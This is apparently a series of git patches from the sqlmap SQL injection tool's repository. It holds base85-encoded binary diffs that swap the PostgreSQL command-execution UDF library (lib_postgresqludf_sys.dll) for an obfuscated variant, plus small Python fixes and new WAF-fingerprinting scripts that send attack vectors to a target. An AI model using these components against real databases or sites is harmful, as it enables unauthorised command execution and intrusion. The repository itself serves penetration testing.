zO`Tn!Ef))1iRkDLC5>s?(S4`WM~;jS!qSt7M4PDG0Tis?&z=$ImOl@g!Jv5X$h2qT
zfP%l#isF6ooADwWysK1caNW0-$D;9P!o;on?BoiY6W6)(d|cfgnu^nQ4(+5;NJJ(}
z><oVCJto6kS7e9B5eMvHfp!}{47w2mc9DoZ5Gl{#iBq>BP-R4YB#Sb-8O(wsRK0kL
zBOIu~O2yfpRxJ_t+tB<80nb_;qqO*O^bm|?yN2G5ftsb+1N|^9O+8^2l*SII)1abv
z0nh=f9hP8m@8>NPRqZC`-JBP@()K%h9YnKo?unXE>sRFfhOQkCi6P#yhD-n@>J4;A
znCvfjQ7||<N63DHFAw!1&s-dsDp<hPLHkR%PqV5pJo_(8%?ozz9@Ny-6JAl<GbN6(
zWj1LD)1xi~tG@3?(1ju4*hn0#h5=j}vK9y6-x&pn(@Z70$iUi5fL)0B+^hN$uS$&E
z$lrG$>&(=G-A{Q!J}%Sum=*Q|)7TeY40H)r4;6(Ds3dtADUEs*MT1C_GidOp5d+cB
znD4sdegusM=sREV3v?E_&%;kM(J#eq$oSYj+Fij^C1H{znkJjh&StLY28d>`*=<P(
z-n)K+Xg!dHI~F;@Q*8qZrQa?>i1mrk3xSO8#$;a?Xy}gIjND5=G>ZcK235M7bC^G!
z8^)O>@j?it{>>QZZx5vf&8PrOFL_O`u>M^HGpl;H>FmU)A3r0{LSby|RCRP`W!ntT
z@<w9xe1>2@(K#eCJ(!Y@Xr-aos^1+Q!6@REC>zgFFleTC63h!03QMnDV0A_m0}<-2
z=$7rVmA?L|1<LQha2<BNUuot501*EGfoNJ`bHsiy&MVdHYQC*2<@b04b^bcuO@TXe
zlwmX0iqc$PS2Gn)!0KZvcDE<3(r3cGj0MeIgHv!RG;+Qbr8BQe7ix&FGpiw6N~rmT
z{vji<xmRkies04BeAryVz5MwBA&X`!QAl&qWOB%LjXnEt_E`rWcvEt)%%~_`T9XpM
z(ZdvtA8RL3)KqlA#+Y<uA$1^X$7_5n+Zk$bXu?&l%Jy^jl4U6ub+vl1-is6~Im#Qb
zeg~tFs&lZ{;;{Ju$N1O5=l}iD!{)!{6xjTiKED^s9%8JK!)4hkQ&2`X<QuL4Vi;BX
zR1+Q0TGzINg#>C=N`ik-t~siCjfAPZ@x?A)0sN@sYfus4EABk_0sMaezkq)Mu$Qf>
z6m%=AkJQWZly^r|XZ4_i;^1FjOy;PRvPZaEdK<;|(QC5cV?Hs6)L`~-hI&S}wEWha
zmu~+Kd%yBn9sSh-u}|{V2J0Ms4AJ!ZBXNEb*Wd6R6ZO~M@TOm8@UwpEe<^?5NvZe#
zTm27`#>HE&jEQJ_@T247p?i@>Rc53!t}Q-At$xYX!+Aj?b9}uAtt&weU(%O<Ai?3x
z3F?ZJ%Yk|LHZq>Df6tc0ml6-+(#j#WmgycOFp74f1U^}SM<%!CDB3At_zE%ND&XU=
zQW3zn{r`FFK2x@BOTbaED%rNHW$@0m$-o3t&}@8De<yVhM8J=J)_(kT9~9-(y2pXF
zF@V6Ce_cFKj=NBTBCCC;9uMA1Go(M5R4z0Ol}(AlsF6OpBZ)nB8Lcu?$u1S(J*nyn
z=3o!N4F;W~e-u1$H098%y}U~S7W0~_tr-$jHdutmQHdb($KU%P@KpS0`kQAb>mE93

literal 0
HcmV?d00001

diff --git a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll
deleted file mode 100644
index 5df72e78a7908fd7c902776d5712fff37ad4367e..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 5632
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
P5B(&3cerg2|2_Q++E^&v

diff --git a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
new file mode 100644
index 0000000000000000000000000000000000000000..612535c700ad54fa0712f4c71cd30c0b6f8fd54b
GIT binary patch
literal 4231
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

literal 0
HcmV?d00001


From fb645b90f7797c69875d514fe7946803272f7740 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 14 Dec 2014 00:14:18 +0100
Subject: [PATCH 222/492] Minor update

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 37555c2e0..e4be4dd3d 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2847,7 +2847,7 @@ def showHttpErrorCodes():
         if any((str(_).startswith('4') or str(_).startswith('5')) and _ != httplib.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes.keys()):
             msg = "too many 4xx and/or 5xx HTTP error codes "
             msg += "could mean that some kind of protection is involved (e.g. WAF)"
-            logger.warn(msg)
+            logger.debug(msg)
 
 def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="replace", buffering=1):
     """

From e17e703e3e9c5892509747d9e4b85a2121f01e3e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 14 Dec 2014 00:17:43 +0100
Subject: [PATCH 223/492] Minor bug fix (for Windows nagging message about
 Unicode data)

---
 lib/core/convert.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/convert.py b/lib/core/convert.py
index 5979c9d91..2cd58bb64 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -159,7 +159,7 @@ def stdoutencode(data):
         if IS_WIN:
             output = data.encode(sys.stdout.encoding, "replace")
 
-            if '?' in output:
+            if '?' in output and '?' not in data:
                 warnMsg = "cannot properly display Unicode characters "
                 warnMsg += "inside Windows OS command prompt "
                 warnMsg += "(http://bugs.python.org/issue1602). All "

From c995c5252fef833b3a26ebd2907a529c1c14380c Mon Sep 17 00:00:00 2001
From: flsf <jianmaflsf@gmail.com>
Date: Mon, 15 Dec 2014 03:08:39 +0800
Subject: [PATCH 224/492] Update of jiasule.py WAF script

---
 waf/jiasule.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/waf/jiasule.py b/waf/jiasule.py
index d3b5aeb4f..45601a8ae 100644
--- a/waf/jiasule.py
+++ b/waf/jiasule.py
@@ -18,6 +18,7 @@ def detect(get_page):
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retval = re.search(r"jiasule-WAF", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
+        retval |= re.search(r"__jsluid=", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
         retval |= re.search(r"static\.jiasule\.com/static/js/http_error\.js", page, re.I) is not None
         if retval:
             break

From e946315736ef471fa3fb51edf458bf22b7e6d273 Mon Sep 17 00:00:00 2001
From: flsf <jianmaflsf@gmail.com>
Date: Mon, 15 Dec 2014 03:12:53 +0800
Subject: [PATCH 225/492] Adding new WAF script (360)

---
 waf/360.py | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 waf/360.py

diff --git a/waf/360.py b/waf/360.py
new file mode 100644
index 000000000..26a7cef52
--- /dev/null
+++ b/waf/360.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import re
+
+from lib.core.enums import HTTP_HEADER
+from lib.core.settings import WAF_ATTACK_VECTORS
+
+__product__ = "360 Web Application Firewall (360wzb)"
+
+def detect(get_page):
+    retval = False
+
+    for vector in WAF_ATTACK_VECTORS:
+        page, headers, code = get_page(get=vector)
+        retval = re.search(r"wangzhan\.360\.cn", headers.get("X-Powered-By-360wzb", ""), re.I) is not None
+        if retval:
+            break
+
+    return retval

From 9d93180153aca08e93cf83a8bf59dfe2b0d2e2c3 Mon Sep 17 00:00:00 2001
From: flsf <jianmaflsf@gmail.com>
Date: Mon, 15 Dec 2014 03:14:16 +0800
Subject: [PATCH 226/492] Adding new WAF script (Anquanbao)

---
 waf/anquanbao.py | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 waf/anquanbao.py

